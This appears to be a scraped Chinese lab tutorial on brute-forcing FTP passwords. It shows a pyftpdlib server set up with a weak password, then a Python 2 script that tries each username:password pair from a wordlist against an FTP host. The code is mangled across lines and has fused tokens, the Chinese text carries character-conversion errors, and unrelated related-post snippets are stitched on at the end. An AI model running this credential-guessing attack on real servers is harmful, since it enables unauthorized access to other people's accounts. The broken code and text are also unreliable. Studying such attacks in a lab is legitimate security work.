暴力破解FTP口令

2021-09-29 08:14:52 字數 1714 閱讀 8875

//

/先啟動ftp服務

from pyftpdlib.handlers import ftphandler

from pyftpdlib.servers import ftpserver

from pyftpdlib.authorizers import dummyauthorizer

authorizer = dummyauthorizer(

)authorizer.add_user(

'python'

,'123456'

,'c:\\users\wxr'

,perm=

'elradfmwm'

)handler = ftphandler

handler.authorizer = authorizer

server = ftpserver(

('0.0.0.0'

,8888

), handler)

server.serve_forever()//

////

////

////

////

////

////

kali中新建乙個字典檔案userpass.txt

裡面羅列數個使用者名稱和密碼我們採用暴力破解方法

比如admin:

123456

然後kali中執行以下**

讀取上述檔案裡的使用者名稱和密碼乙個個試

#!/usr/bin/python

# -*- coding: utf-8 -*-

import ftplib, time

defbrutelogin

(hostname, passwdfile)

: pf =

open

(passwdfile,

'r')

for line in pf.readlines():

username = line.split(

':')[0

] password = line.split(

':')[1

].strip(

)print

"[+] trying: "

+username+

"/"+password

try: ftp = ftplib.ftp(hostname)

ftp.login(username, password)

print

'\n[*] '

+str

(hostname)

+\ ' ftp logon succeeded: '

+username+

"/"+password

ftp.quit(

)return

(username, password)

except exception, e:

pass

print

'\n[-] could not brute force ftp credentials.'

return

(none

,none

)host =

'192.168.43.135'

passwdfile =

'userpass.txt'

brutelogin(host, passwdfile)

python 弱口令暴力破解工具

環境 python 3.6.7 coding utf 8 import pymysql success false f user open username.txt r f pwd open password.txt r lines user f user.readlines 讀取出來是乙個列表 l...

弱口令掃瞄 暴力破解密碼

在internet環境中,過於簡單的口令時伺服器面臨的最大風險。儘管大家都知道複雜的口令更安全,但仍然有很多使用者貪圖方便而採用簡單的口令。對於任何乙個承擔安全責任的管理員,及時找出這些弱口令賬戶時非常必要的 為保證linux伺服器平台的安全性,需要按照表2 1中加固項,對現網系統進行安全加固,防止...

用 swatch 搞定 ftp 暴力破解問題

為方便公司fans 的站長們上傳檔案,用了pureftp。pureftp表現確實不錯,不但穩定可靠,特徵豐富,而且在安全方面也很便於調控。維護人員挺擔心,希望盡快搞定這個問題。怎麼辦呢?pureftp本身的特徵似乎並不好解決暴力破解問題,後來想了想,決定用swatch來搞定。url 2.安裝 swa...